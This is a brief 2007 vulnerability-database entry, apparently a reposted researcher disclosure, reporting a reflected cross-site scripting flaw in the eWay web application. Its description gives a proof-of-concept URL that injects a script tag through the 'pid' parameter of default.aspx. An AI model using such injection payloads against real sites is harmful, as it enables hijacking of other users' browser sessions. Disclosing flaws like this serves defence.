XSS in eWay

2007-02-13T00:00:00
ID SECURITYVULNS:DOC:16045
Type securityvulns
Reporter Securityvulns
Modified 2007-02-13T00:00:00

Description

hey guys .. check out this new xss i just found ;P

Vulnerable : eWay web : http://www.eway.no/eway

XSS :

http://127.0.0.1/path/default.aspx?pid="><script>alert('bl4ck')</script>

Discovered By BLacK ZeRo bL4ck@bsdmail.org

Best regards ,,